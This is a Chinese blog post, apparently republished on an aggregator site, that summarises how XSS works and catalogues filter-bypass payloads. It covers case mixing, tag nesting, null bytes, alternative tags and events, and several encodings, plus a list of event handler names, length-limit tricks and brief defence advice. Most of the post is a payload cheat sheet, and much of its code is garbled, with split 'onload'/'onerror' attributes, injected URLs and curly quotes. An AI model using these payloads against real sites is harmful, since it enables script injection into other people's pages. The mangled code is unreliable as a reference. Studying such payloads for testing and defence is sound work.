xss原理繞過防御個人總結-有解無憂

xss原理

xss產生的原因是將惡意的html腳本代碼插入web頁面，底層原理和sql注入一樣，都是因為js和php等都是解釋性語言，會將輸入的當做命令執行,所以可以注入惡意代碼執行我們想要的內容

xss分類

存盤型xss:
js腳本代碼會插入資料庫，具有一定的持久性
反射型xss:
js經過后端php等語言處理
dom型xss:
和反射型xss類似，但是不經過后端服務器的處理

xss繞過總結:

自身繞過

<script>alert('xss')</script>  //沒有過濾
<Script>alert('xss')</Script> //大小寫繞過
<scscriptript>alert('xss')</scscriptript> //嵌套繞過
<sc\x00ript>alert('xss')</sc\x00ript> //空位元組繞過
" oonnclick=alert('XSS') //           //閉合單雙引號繞過(對于html物體輸入的和過濾< >)

其他標簽繞過

<a herf="javascript:alert(1)">show</a> 
<body onl oad=alert(1)>
<input type=image src=https://www.cnblogs.com/Lmg66/p/x:x one rror=alert(1)>


<input oncut=alert(1)>
<svg onl oad=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video><source one rror="alert(1)">
<marquee onstart=alert(1)>
</code></pre>
<h3 id="編碼繞過">編碼繞過</h3>
<h4 id="base64編碼繞過">base64編碼繞過</h4>
<pre><code><a herf="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">show</a>
<img src=https://www.cnblogs.com/Lmg66/p/"x" one rror="eval(atob('ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cuYmFpZHUuY29tJw=='))">               
</code></pre>
<h4 id="unicode編碼繞過">Unicode編碼繞過</h4>
<p>在線編碼地址:http://tool.chinaz.com/tools/unicode.aspx</p>
<pre><code><img src=https://www.cnblogs.com/Lmg66/p/"x" one rror="eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029\u003b')">
<script>\u0061lert(1)</script>
<img src=https://www.cnblogs.com/Lmg66/p/"x" one rror="alert("xss");">
</code></pre>
<p><img src="https://img.uj5u.com/2020/09/18/82378181139471.png" alt="" loading="lazy"></p>
<h4 id="url編碼繞過">url編碼繞過</h4>
<pre><code><img src=https://www.cnblogs.com/Lmg66/p/"x" one rror="eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))">
</code></pre>
<h4 id="ascii碼繞過">Ascii碼繞過</h4>
<pre><code><script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))</script>
</code></pre>
<p>可使用瀏覽器插件快速編碼<br>
<img src="https://img.uj5u.com/2020/09/18/82378181139472.png" alt="" loading="lazy"></p>
<h4 id="hex繞過">hex繞過</h4>
<pre><code><img src=https://www.cnblogs.com/Lmg66/p/x one rror=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')>
</code></pre>
<h4 id="十進制，八進制，十六進制">十進制，八進制，十六進制</h4>
<pre><code><img src=https://www.cnblogs.com/Lmg66/p/x one rror="/u0061lert(1)"/>
<img src=x one rror="eval('\141lert(1)')"/>
<img src=https://www.cnblogs.com/Lmg66/p/x one rror="eval('\x61lert(1)')"/>
<img src=https://www.cnblogs.com/Lmg66/p/x one rror=”alert(1)”/>
<img src=x one rror=”alert(1)”/>
<img src=x one rror=”eval(‘/a/l/ert(1)‘)”/>
</code></pre>
<h3 id="補充on事件">補充:on事件</h3>
<pre><code>onsearch
onwebkitanimationend
onwebkitanimationiteration
onwebkitanimationstart
onwebkittransitionend
onabort
onblur
oncancel
oncanplay
oncanplaythrough
onchange
onclick
onclose
oncontextmenu
oncuechange
ondblclick
ondrag
ondragend
ondragenter
ondragleave
ondragover
ondragstart
ondrop
ondurationchange
onemptied
onended
onerror
onfocus
onformdata
oninput
oninvalid
onkeydown
onkeypress
onkeyup
onload
onloadeddata
onloadedmetadata
onloadstart
onmousedown
onmouseenter
onmouseleave
onmousemove
onmouseout
onmouseover
onmouseup
onmousewheel
onpause
onplay
onplaying
onprogress
onratechange
onreset
onresize
onscroll
onseeked
onseeking
onselect
onstalled
onsubmit
onsuspend
ontimeupdate
ontoggle
onvolumechange
onwaiting
onwheel
onauxclick
ongotpointercapture
onlostpointercapture
onpointerdown
onpointermove
onpointerup
onpointercancel
onpointerover
onpointerout
onpointerenter
onpointerleave
onselectstart
onselectionchange
onanimationend
onanimationiteration
onanimationstart
ontransitionend
onafterprint
onbeforeprint
onbeforeunload
onhashchange
onlanguagechange
onmessage
onmessageerror
onoffline
ononline
onpagehide
onpageshow
onpopstate
onrejectionhandled
onstorage
onunhandledrejection
onunload
</code></pre>
<h3 id="長度限制的繞過">長度限制的繞過:</h3>
<h4 id="可以利用事件如">可以利用事件如:</h4>
<pre><code>"onclick=alert(1)// 來減少字數
</code></pre>
<h4 id="將代碼藏入locationhash中，構造為">將代碼藏入location.hash中，構造為</h4>
<pre><code>"onclick="eval(location.hash.sustr(1))
</code></pre>
<h4 id="注釋將兩個文本框變為一個">注釋將兩個文本框變為一個</h4>
<h4 id="奇怪的符號決議">奇怪的符號決議</h4>
<pre><code><svg/onload=alert()>
<script/src=https://www.cnblogs.com//?.?>
</code></pre>
<p>參考文章:https://nosec.org/home/detail/3206.html</p>
<h2 id="xss防御">xss防御</h2>
<ol>
<li>設定cookie中設定httponly屬性，那么js腳本將無法讀取到cookie資訊<br>
PHP5(PHP5.2以上版本已支持HttpOnly引數的設定，同樣也支持全域的HttpOnly的設定，在php.ini中設定，設定其值為1或者TRUE，來開啟全域的Cookie的HttpOnly屬性)<br>
session.cookie_httponly =<br>
當然代碼也能實作：<br>
ini_set("session.cookie_httponly", 1);<br>
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);</li>
<li>限制輸入長度，在業務內減少用戶能輸入長度，像年齡，用戶名等地方限制15個字符，幾乎就很難xss（個人理解）</li>
<li>過濾業務用不到的字符如< >，script等標簽字符</li>
<li>輸出檢查，輸出到url的進行URLEncode，輸出進行html物體化輸出</li>
<li>成熟框架相對安全些（注意是相對）</li>
</ol>
<h2 id="參考文章">參考文章</h2>
<p>深入理解瀏覽器決議機制和XSS向量編碼：http://bobao.360.cn/learning/detail/292.html<br>
XSS過濾繞過速查表：https://www.freebuf.com/articles/web/153055.html<br>
《白帽子講web安全》<br>
歡迎訪問我的個人博客：https://lmg66.github.io/<br>
說明：本文僅限技術研究與討論，嚴禁用于非法用途，否則產生的一切后果自行承擔</p><script src="/d/js/kkb.js"></script>
<p><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-4501889605140124"
     crossorigin="anonymous"></script>
<!-- uj5u_foot -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-4501889605140124"
     data-ad-slot="5909531792"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script></p>

      <div class="pagebar">  </div>
      <span class="banquanshengming">轉載請註明出處，本文鏈接：<a href='/qita/73495.html'>https://www.uj5u.com/qita/73495.html</a></span>
      <p>標籤：<a href='/e/tags/?tagname=%E5%85%B6%E4%BB%96' target='_blank'>其他</a> </p>
      <p>上一篇：<a href='/qita/73492.html'>ElasticSearchd未授權訪問</a></p><p>下一篇：<a href='/qita/73497.html'>記一次抓包和破解App介面</a></p>
     </div>
</div>

  <div class="right">
    <dl class="function" id="twking">
      <dd class="function_c">
        <div><iframe height="300px" frameborder="0" scrolling="no" src="https://www.uj5u.com/twking.html"></iframe></div>
      </dd>
    </dl>
    <dl class="function" id="biaoqianyun">
      <dt class="function_t">標籤雲</dt>
      <dd class="function_c">
        <div>    <a href="/e/tags/?tagname=%E5%85%B6%E4%BB%96"  target="_blank" title="157675個話題" >其他(157675)</a>        <a href="/e/tags/?tagname=Python"  target="_blank" title="38076個話題" >Python(38076)</a>        <a href="/e/tags/?tagname=JavaScript"  target="_blank" title="25376個話題" >JavaScript(25376)</a>        <a href="/e/tags/?tagname=Java"  target="_blank" title="17977個話題" >Java(17977)</a>        <a href="/e/tags/?tagname=C"  target="_blank" title="15215個話題" >C(15215)</a>        <a href="/e/tags/?tagname=%E5%8D%80%E5%A1%8A%E9%8F%88"  target="_blank" title="8255個話題" >區塊鏈(8255)</a>        <a href="/e/tags/?tagname=C%EF%BC%83"  target="_blank" title="7972個話題" >C＃(7972)</a>        <a href="/e/tags/?tagname=AI"  target="_blank" title="7469個話題" >AI(7469)</a>        <a href="/e/tags/?tagname=%E7%88%AA%E5%93%87"  target="_blank" title="7425個話題" >爪哇(7425)</a>        <a href="/e/tags/?tagname=MySQL"  target="_blank" title="7132個話題" >MySQL(7132)</a>        <a href="/e/tags/?tagname=html"  target="_blank" title="6777個話題" >html(6777)</a>        <a href="/e/tags/?tagname=%E5%9F%BA%E7%A4%8E%E9%A1%9E"  target="_blank" title="6313個話題" >基礎類(6313)</a>        <a href="/e/tags/?tagname=sql"  target="_blank" title="6102個話題" >sql(6102)</a>        <a href="/e/tags/?tagname=%E7%86%8A%E7%8C%AB"  target="_blank" title="6058個話題" >熊猫(6058)</a>        <a href="/e/tags/?tagname=PHP"  target="_blank" title="5869個話題" >PHP(5869)</a>        <a href="/e/tags/?tagname=%E6%95%B0%E7%BB%84"  target="_blank" title="5741個話題" >数组(5741)</a>        <a href="/e/tags/?tagname=R"  target="_blank" title="5409個話題" >R(5409)</a>        <a href="/e/tags/?tagname=Linux"  target="_blank" title="5327個話題" >Linux(5327)</a>        <a href="/e/tags/?tagname=%E5%8F%8D%E5%BA%94"  target="_blank" title="5209個話題" >反应(5209)</a>        <a href="/e/tags/?tagname=%E8%85%B3%E6%9C%AC%E8%AA%9E%E8%A8%80%28PerlPython%29"  target="_blank" title="5129個話題" >腳本語言(PerlPython)(5129)</a>        <a href="/e/tags/?tagname=%E9%9D%9E%E6%8A%80%E8%A1%93%E5%8D%80"  target="_blank" title="4971個話題" >非技術區(4971)</a>        <a href="/e/tags/?tagname=Android"  target="_blank" title="4554個話題" >Android(4554)</a>        <a href="/e/tags/?tagname=%E6%95%B0%E6%8D%AE%E6%A1%86"  target="_blank" title="4311個話題" >数据框(4311)</a>        <a href="/e/tags/?tagname=css"  target="_blank" title="4259個話題" >css(4259)</a>        <a href="/e/tags/?tagname=%E8%8A%82%E7%82%B9.js"  target="_blank" title="4032個話題" >节点.js(4032)</a>        <a href="/e/tags/?tagname=C%E8%AA%9E%E8%A8%80"  target="_blank" title="3288個話題" >C語言(3288)</a>        <a href="/e/tags/?tagname=json"  target="_blank" title="3245個話題" >json(3245)</a>        <a href="/e/tags/?tagname=%E5%88%97%E8%A1%A8"  target="_blank" title="3129個話題" >列表(3129)</a>        <a href="/e/tags/?tagname=%E6%89%91"  target="_blank" title="3119個話題" >扑(3119)</a>        <a href="/e/tags/?tagname=C%2B%2B%E8%AA%9E%E8%A8%80"  target="_blank" title="3117個話題" >C++語言(3117)</a>        <a href="/e/tags/?tagname=%E5%AE%89%E5%8D%93"  target="_blank" title="2998個話題" >安卓(2998)</a>        <a href="/e/tags/?tagname=%E6%89%93%E5%AD%97%E7%A8%BF"  target="_blank" title="2995個話題" >打字稿(2995)</a>        <a href="/e/tags/?tagname=VBA"  target="_blank" title="2789個話題" >VBA(2789)</a>        <a href="/e/tags/?tagname=Java%E7%9B%B8%E9%97%9C"  target="_blank" title="2746個話題" >Java相關(2746)</a>        <a href="/e/tags/?tagname=%E7%96%91%E9%9B%A3%E5%95%8F%E9%A1%8C"  target="_blank" title="2699個話題" >疑難問題(2699)</a>        <a href="/e/tags/?tagname=%E7%BB%86%E7%BB%B3"  target="_blank" title="2522個話題" >细绳(2522)</a>        <a href="/e/tags/?tagname=%E5%96%AE%E7%89%87%E6%A9%9F%E5%B7%A5%E6%8E%A7"  target="_blank" title="2479個話題" >單片機工控(2479)</a>        <a href="/e/tags/?tagname=iOS"  target="_blank" title="2429個話題" >iOS(2429)</a>        <a href="/e/tags/?tagname=ASP.NET"  target="_blank" title="2402個話題" >ASP.NET(2402)</a>        <a href="/e/tags/?tagname=MongoDB"  target="_blank" title="2323個話題" >MongoDB(2323)</a>        <a href="/e/tags/?tagname=%E9%BA%BB%E6%9C%A8%E7%9A%84"  target="_blank" title="2285個話題" >麻木的(2285)</a>        <a href="/e/tags/?tagname=%E6%AD%A3%E5%88%99%E8%A1%A8%E8%BE%BE%E5%BC%8F"  target="_blank" title="2254個話題" >正则表达式(2254)</a>        <a href="/e/tags/?tagname=%E5%AD%97%E5%85%B8"  target="_blank" title="2211個話題" >字典(2211)</a>        <a href="/e/tags/?tagname=%E5%BE%AA%E7%8E%AF"  target="_blank" title="2198個話題" >循环(2198)</a>        <a href="/e/tags/?tagname=%E8%BF%85%E9%80%9F"  target="_blank" title="2185個話題" >迅速(2185)</a>        <a href="/e/tags/?tagname=%E6%93%85%E9%95%BF"  target="_blank" title="2169個話題" >擅长(2169)</a>        <a href="/e/tags/?tagname=%E9%95%96"  target="_blank" title="2155個話題" >镖(2155)</a>        <a href="/e/tags/?tagname=%E5%8A%9F%E8%83%BD"  target="_blank" title="1967個話題" >功能(1967)</a>        <a href="/e/tags/?tagname=.NET%E6%8A%80%E6%9C%AF"  target="_blank" title="1958個話題" >.NET技术(1958)</a>        <a href="/e/tags/?tagname=Web%E9%96%8B%E7%99%BC"  target="_blank" title="1951個話題" >Web開發(1951)</a>        <a href="/e/tags/?tagname=python-3.x"  target="_blank" title="1918個話題" >python-3.x(1918)</a>        <a href="/e/tags/?tagname=HtmlCss"  target="_blank" title="1915個話題" >HtmlCss(1915)</a>        <a href="/e/tags/?tagname=%E5%BC%B9%E7%B0%A7%E9%9D%B4"  target="_blank" title="1913個話題" >弹簧靴(1913)</a>        <a href="/e/tags/?tagname=C%2B%2B"  target="_blank" title="1909個話題" >C++(1909)</a>        <a href="/e/tags/?tagname=xml"  target="_blank" title="1889個話題" >xml(1889)</a>        <a href="/e/tags/?tagname=PostgreSQL"  target="_blank" title="1872個話題" >PostgreSQL(1872)</a>        <a href="/e/tags/?tagname=.NETCore"  target="_blank" title="1853個話題" >.NETCore(1853)</a>        <a href="/e/tags/?tagname=%E8%B0%B7%E6%AD%8C%E8%A1%A8%E6%A0%BC"  target="_blank" title="1846個話題" >谷歌表格(1846)</a>        <a href="/e/tags/?tagname=Unity3D"  target="_blank" title="1843個話題" >Unity3D(1843)</a>        <a href="/e/tags/?tagname=for%E5%BE%AA%E7%8E%AF"  target="_blank" title="1842個話題" >for循环(1842)</a>        </div>
      </dd>
    </dl>
    <dl class="function" id="ad1">
      <!--<dt class="function_t"></dt>-->
      <dd class="function_c">
        <div><div class="pcd_ad"><p><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-4501889605140124"
     crossorigin="anonymous"></script>
<!-- uj5u_right -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-4501889605140124"
     data-ad-slot="2736573541"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script></p></div><div class="mbd_ad"><p><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-4501889605140124"
     crossorigin="anonymous"></script>
<!-- uj5u_right -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-4501889605140124"
     data-ad-slot="2736573541"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script></p></div></div>
      </dd>
    </dl>
    <dl class="function" id="divPrevious">
      <dt class="function_t">熱門瀏覽</dt>
      <dd class="function_c">
        <ul>
<li>
        <div class="list"> <a class="title" href="/qita/435.html">網閘典型架構簡述</a>
          <p>網閘架構一般分為兩種：三主機的三系統架構網閘和雙主機的2+1架構網閘。 三主機架構分別為內端機、外端機和仲裁機。三機無論從軟體和硬體上均各自獨立。首先從硬體上來看，三機都用各自獨立的主板、記憶體及存盤設備。從軟體上來看，三機有各自獨立的作業系統。這樣能達到完全的三機獨立。對于“2+1”系統，“2”分為 ......</p>
          <i class="f-jkico f-jkicoy"></i> <span class="ispan"><i class="i-ico zuozhe"></i>uj5u.com</span> <span class="ispan"><i class="i-ico time"></i>2020-09-10 02:00:44</span> <a class="quanwen" href="/qita/435.html">more</a></div>
      </li><li>
        <div class="list"> <a class="title" href="/qita/436.html">如何從xshell上傳檔案到centos linux虛擬機里</a>
          <p>如何從xshell上傳檔案到centos linux虛擬機里及：虛擬機CentOs下執行 yum -y install lrzsz命令，出現錯誤：鏡像無法找到軟體包 前言 一、安裝lrzsz步驟 二、上傳檔案 三、遇到的問題及解決方案 總結 前言 提示：其實很簡單，往虛擬機上安裝一個上傳檔案的工具  ......</p>
          <i class="f-jkico f-jkicoy"></i> <span class="ispan"><i class="i-ico zuozhe"></i>uj5u.com</span> <span class="ispan"><i class="i-ico time"></i>2020-09-10 02:00:47</span> <a class="quanwen" href="/qita/436.html">more</a></div>
      </li><li>
        <div class="list"> <a class="title" href="/qita/437.html">一、SQLMAP入門</a>
          <p>一、SQLMAP入門 1、判斷是否存在注入 sqlmap.py -u 網址/id=1 id=1不可缺少。當注入點后面的引數大于兩個時。需要加雙引號， sqlmap.py -u "網址/id=1&uid=1" 2、判斷文本中的請求是否存在注入 從文本中加載http請求，SQLMAP可以從一個文本檔案中 ......</p>
          <i class="f-jkico f-jkicoy"></i> <span class="ispan"><i class="i-ico zuozhe"></i>uj5u.com</span> <span class="ispan"><i class="i-ico time"></i>2020-09-10 02:00:50</span> <a class="quanwen" href="/qita/437.html">more</a></div>
      </li><li>
        <div class="list"> <a class="title" href="/qita/438.html">Metasploit 簡單使用教程</a>
          <p>metasploit 簡單使用教程 浩先生， 2020-08-28 16:18:25 分類專欄： kail 網路安全 linux 文章標簽： linux資訊安全 編輯 著作權 metasploit 使用教程 前言 一、Metasploit是什么？ 二、準備作業 三、具體步驟 前言 Msfconsole ......</p>
          <i class="f-jkico f-jkicoy"></i> <span class="ispan"><i class="i-ico zuozhe"></i>uj5u.com</span> <span class="ispan"><i class="i-ico time"></i>2020-09-10 02:00:53</span> <a class="quanwen" href="/qita/438.html">more</a></div>
      </li><li>
        <div class="list"> <a class="title" href="/qita/439.html">游戲逆向之驅動層與用戶層通訊</a>
          <p>驅動層代碼： #pragma once #include <ntifs.h> #define add_code CTL_CODE(FILE_DEVICE_UNKNOWN,0x800,METHOD_BUFFERED,FILE_ANY_ACCESS) /* 更多游戲逆向視頻www.yxfzedu.com ......</p>
          <i class="f-jkico f-jkicoy"></i> <span class="ispan"><i class="i-ico zuozhe"></i>uj5u.com</span> <span class="ispan"><i class="i-ico time"></i>2020-09-10 02:00:56</span> <a class="quanwen" href="/qita/439.html">more</a></div>
      </li><li>
        <div class="list"> <a class="title" href="/qita/440.html">北斗電力時鐘（北斗授時服務器）讓網路資料更精準</a>
          <p>北斗電力時鐘（北斗授時服務器）讓網路資料更精準 北斗電力時鐘（北斗授時服務器）讓網路資料更精準 京準電子科技官微——ahjzsz 近幾年，資訊技術的得了快速發展，互聯網在逐漸普及，其在人們生活和生產中都得到了廣泛應用，并且取得了不錯的應用效果。計算機網路資訊在電力系統中的應用，一方面使電力系統的運行 ......</p>
          <i class="f-jkico f-jkicoy"></i> <span class="ispan"><i class="i-ico zuozhe"></i>uj5u.com</span> <span class="ispan"><i class="i-ico time"></i>2020-09-10 02:01:03</span> <a class="quanwen" href="/qita/440.html">more</a></div>
      </li><li>
        <div class="list"> <a class="title" href="/qita/441.html">【CTF】CTFHub 技能樹 彩蛋 writeup</a>
          <p>?碎碎念 CTFHub：https://www.ctfhub.com/ 筆者入門CTF時時剛開始刷的是bugku的舊平臺，后來才有了CTFHub。 感覺不論是網頁UI設計，還是題目質量，賽事跟蹤，工具軟體都做得很不錯。 而且因為獨到的金幣制度的確讓人有一種想去刷題賺金幣的感覺。 個人還是非常喜歡這個 ......</p>
          <i class="f-jkico f-jkicoy"></i> <span class="ispan"><i class="i-ico zuozhe"></i>uj5u.com</span> <span class="ispan"><i class="i-ico time"></i>2020-09-10 02:04:05</span> <a class="quanwen" href="/qita/441.html">more</a></div>
      </li><li>
        <div class="list"> <a class="title" href="/qita/442.html">02windows基礎操作</a>
          <p>我學到了一下幾點 Windows系統目錄結構與滲透的作用 常見Windows的服務詳解 Windows埠詳解 常用的Windows注冊表詳解 hacker DOS命令詳解（net user / type /md /rd/ dir /cd /net use copy、批處理 等） 利用dos命令制作 ......</p>
          <i class="f-jkico f-jkicoy"></i> <span class="ispan"><i class="i-ico zuozhe"></i>uj5u.com</span> <span class="ispan"><i class="i-ico time"></i>2020-09-10 02:04:18</span> <a class="quanwen" href="/qita/442.html">more</a></div>
      </li><li>
        <div class="list"> <a class="title" href="/qita/443.html">03.Linux基礎操作</a>
          <p>我學到了以下幾點 01Linux系統介紹02系統安裝，密碼啊破解03Linux常用命令04LAMP 01LINUX windows： win03 8 12 16 19 配置不繁瑣 Linux：redhat,centos(紅帽社區版)，Ubuntu server,suse unix:金融機構，證券，銀 ......</p>
          <i class="f-jkico f-jkicoy"></i> <span class="ispan"><i class="i-ico zuozhe"></i>uj5u.com</span> <span class="ispan"><i class="i-ico time"></i>2020-09-10 02:04:30</span> <a class="quanwen" href="/qita/443.html">more</a></div>
      </li><li>
        <div class="list"> <a class="title" href="/qita/444.html">05HTML</a>
          <p>01HTML介紹 02頭部標簽講解03基礎標簽講解04表單標簽講解 HTML前段語言 js1.了解代碼2.根據代碼 懂得挖掘漏洞 （POST注入/XSS漏洞上傳）3.黑帽seo 白帽seo 客戶網站被黑帽植入劫持代碼如何處理4.熟悉html表單 <html><head><title>TDK標題，描述 ......</p>
          <i class="f-jkico f-jkicoy"></i> <span class="ispan"><i class="i-ico zuozhe"></i>uj5u.com</span> <span class="ispan"><i class="i-ico time"></i>2020-09-10 02:04:36</span> <a class="quanwen" href="/qita/444.html">more</a></div>
      </li>        </ul>
      </dd>
    </dl>
    <dl class="function" id="ad2">
      <!--<dt class="function_t"></dt>-->
      <dd class="function_c">
        <div><div class="pcd_ad"></div><div class="mbd_ad"></div></div>
      </dd>
    </dl>
<dl class="function" id="divPrevious">
      <dt class="function_t">最新发布</dt>
      <dd class="function_c">
        <ul>
<li>
        <div class="list"> <a class="title" href="/qita/550616.html">2023年最新微信小程式抓包教程</a>
          <p>01 開門見山 隔一個月發一篇文章，不過分。 首先回顧一下《微信系結手機號資料庫被脫庫事件》，我也是第一時間得知了這個訊息，然后跟蹤了整件事情的經過。下面是這起事件的相關截圖以及近日流出的一萬條資料樣本： 個人認為這件事也沒什么，還不如關注一下之前45億快遞資料查詢渠道疑似在近日復活的訊息。 訊息是 ......</p>
          <i class="f-jkico f-jkicoy"></i> <span class="ispan"><i class="i-ico zuozhe"></i>uj5u.com</span> <span class="ispan"><i class="i-ico time"></i>2023-04-20 08:48:24</span> <a class="quanwen" href="/qita/550616.html">more</a></div>
      </li><li>
        <div class="list"> <a class="title" href="/qita/550615.html">web3 產品介紹：metamask 錢包 使用最多的瀏覽器插件錢包</a>
          <p>Metamask錢包是一種基于區塊鏈技術的數字貨幣錢包，它允許用戶在安全、便捷的環境下管理自己的加密資產。Metamask錢包是以太坊生態系統中最流行的錢包之一，它具有易于使用、安全性高和功能強大等優點。 本文將詳細介紹Metamask錢包的功能和使用方法。 一、 Metamask錢包的功能 數字資 ......</p>
          <i class="f-jkico f-jkicoy"></i> <span class="ispan"><i class="i-ico zuozhe"></i>uj5u.com</span> <span class="ispan"><i class="i-ico time"></i>2023-04-20 08:47:46</span> <a class="quanwen" href="/qita/550615.html">more</a></div>
      </li><li>
        <div class="list"> <a class="title" href="/qita/550570.html">vulnhub_Earth</a>
          <p>前言 靶機地址->>>vulnhub_Earth 攻擊機ip：192.168.20.121 靶機ip：192.168.20.122 參考文章 https://www.cnblogs.com/Jing-X/archive/2022/04/03/16097695.html https://www.cnb ......</p>
          <i class="f-jkico f-jkicoy"></i> <span class="ispan"><i class="i-ico zuozhe"></i>uj5u.com</span> <span class="ispan"><i class="i-ico time"></i>2023-04-20 07:46:20</span> <a class="quanwen" href="/qita/550570.html">more</a></div>
      </li><li>
        <div class="list"> <a class="title" href="/qita/550569.html">從4k到42k，軟體測驗工程師的漲薪史，給我看哭了</a>
          <p>清明節一過，盲猜大家已經無心上班，在數著日子準備過五一，但一想到銀行卡里的余額……瞬間心情就不美麗了。最近，2023年高校畢業生就業調查顯示，本科畢業月平均起薪為5825元。調查一出，便有很多同學表示自己又被平均了。看著這一資料，不免讓人想到前不久中國青年報的一項調查：近六成大學生認為畢業10年內會 ......</p>
          <i class="f-jkico f-jkicoy"></i> <span class="ispan"><i class="i-ico zuozhe"></i>uj5u.com</span> <span class="ispan"><i class="i-ico time"></i>2023-04-20 07:44:00</span> <a class="quanwen" href="/qita/550569.html">more</a></div>
      </li><li>
        <div class="list"> <a class="title" href="/qita/550568.html">最新版本 Stable Diffusion 開源 AI 繪畫工具之中文自動提詞篇</a>
          <p>🎈 標簽生成器 由于輸入正向提示詞 prompt 和反向提示詞 negative prompt 都是使用英文，所以對學習母語的我們非常不友好 使用網址：https://tinygeeker.github.io/p/ai-prompt-generator 這個網址是為了讓大家在使用 AI 繪畫的時候 ......</p>
          <i class="f-jkico f-jkicoy"></i> <span class="ispan"><i class="i-ico zuozhe"></i>uj5u.com</span> <span class="ispan"><i class="i-ico time"></i>2023-04-20 07:43:36</span> <a class="quanwen" href="/qita/550568.html">more</a></div>
      </li><li>
        <div class="list"> <a class="title" href="/qita/550567.html">漫談前端自動化測驗演進之路及測驗工具分析</a>
          <p>隨著前端技術的不斷發展和應用程式的日益復雜，前端自動化測驗也在不斷演進。隨著 Web 應用程式變得越來越復雜，自動化測驗的需求也越來越高。如今，自動化測驗已經成為 Web 應用程式開發程序中不可或缺的一部分，它們可以幫助開發人員更快地發現和修復錯誤，提高應用程式的性能和可靠性。 ......</p>
          <i class="f-jkico f-jkicoy"></i> <span class="ispan"><i class="i-ico zuozhe"></i>uj5u.com</span> <span class="ispan"><i class="i-ico time"></i>2023-04-20 07:43:16</span> <a class="quanwen" href="/qita/550567.html">more</a></div>
      </li><li>
        <div class="list"> <a class="title" href="/qita/550566.html">CANN開發實踐：4個DVPP記憶體問題的典型案例解讀</a>
          <p>摘要：由于DVPP媒體資料處理功能對存放輸入、輸出資料的記憶體有更高的要求（例如，記憶體首地址128位元組對齊），因此需呼叫專用的記憶體申請介面，那么本期就分享幾個關于DVPP記憶體問題的典型案例，并給出原因分析及解決方法。 本文分享自華為云社區《FAQ_DVPP記憶體問題案例》，作者：昇騰CANN。 DVPP ......</p>
          <i class="f-jkico f-jkicoy"></i> <span class="ispan"><i class="i-ico zuozhe"></i>uj5u.com</span> <span class="ispan"><i class="i-ico time"></i>2023-04-20 07:43:03</span> <a class="quanwen" href="/qita/550566.html">more</a></div>
      </li><li>
        <div class="list"> <a class="title" href="/qita/550565.html">msf學習</a>
          <p>msf學習 以kali自帶的msf為例 一、msf核心模塊與功能 msf模塊都放在/usr/share/metasploit-framework/modules目錄下 1、auxiliary 輔助模塊，輔助滲透（埠掃描、登錄密碼爆破、漏洞驗證等） 2、encoders 編碼器模塊，主要包含各種編碼 ......</p>
          <i class="f-jkico f-jkicoy"></i> <span class="ispan"><i class="i-ico zuozhe"></i>uj5u.com</span> <span class="ispan"><i class="i-ico time"></i>2023-04-20 07:42:59</span> <a class="quanwen" href="/qita/550565.html">more</a></div>
      </li><li>
        <div class="list"> <a class="title" href="/qita/550564.html">Halcon軟體安裝與界面簡介</a>
          <p>1. 下載Halcon17版本到到本地 2. 雙擊安裝包后 3. 步驟如下 1.2 Halcon軟體安裝 界面分為四大塊 1. Halcon的五個助手 1) 影像采集助手：與相機連接，設定相機引數，采集影像 2) 標定助手：九點標定或是其它的標定，生成標定檔案及內參外參，可以將像素單位轉換為長度單位 ......</p>
          <i class="f-jkico f-jkicoy"></i> <span class="ispan"><i class="i-ico zuozhe"></i>uj5u.com</span> <span class="ispan"><i class="i-ico time"></i>2023-04-20 07:42:17</span> <a class="quanwen" href="/qita/550564.html">more</a></div>
      </li><li>
        <div class="list"> <a class="title" href="/qita/550563.html">在MacOS下使用Unity3D開發游戲</a>
          <p>第一次發博客，先發一下我的游戲開發環境吧。 去年2月份買了一臺MacBookPro2021 M1pro(以下簡稱mbp)，這一年來一直在用mbp開發游戲。我大致分享一下我的開發工具以及使用體驗。 1、Unity 官網鏈接： https://unity.cn/releases 我一般使用的Apple  ......</p>
          <i class="f-jkico f-jkicoy"></i> <span class="ispan"><i class="i-ico zuozhe"></i>uj5u.com</span> <span class="ispan"><i class="i-ico time"></i>2023-04-20 07:40:19</span> <a class="quanwen" href="/qita/550563.html">more</a></div>
      </li>        </ul>
      </dd>
    </dl>
    <dl class="function" id="flink">
      <dt class="function_t">友情鏈接</dt>
      <dd class="function_c">
        <ul>
                <li><a href="#" target="_blank">有解無憂</a></li>

              </ul>
      </dd>
    </dl>
    <dl class="function" id="ad3">
      <!--<dt class="function_t"></dt>-->
      <dd class="function_c">
        <div><div class="pcd_ad"></div><div class="mbd_ad"></div></div>
      </dd>
    </dl>
  </div>
<!-- 頁腳 -->
  <div class="footer-body">
    <div class="footer">
      <p>Copyright © 2010-2020 <a href="/">有解無憂</a></p>
    </div>
  </div>
</div>
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-4501889605140124"
     crossorigin="anonymous"></script>
</body></html>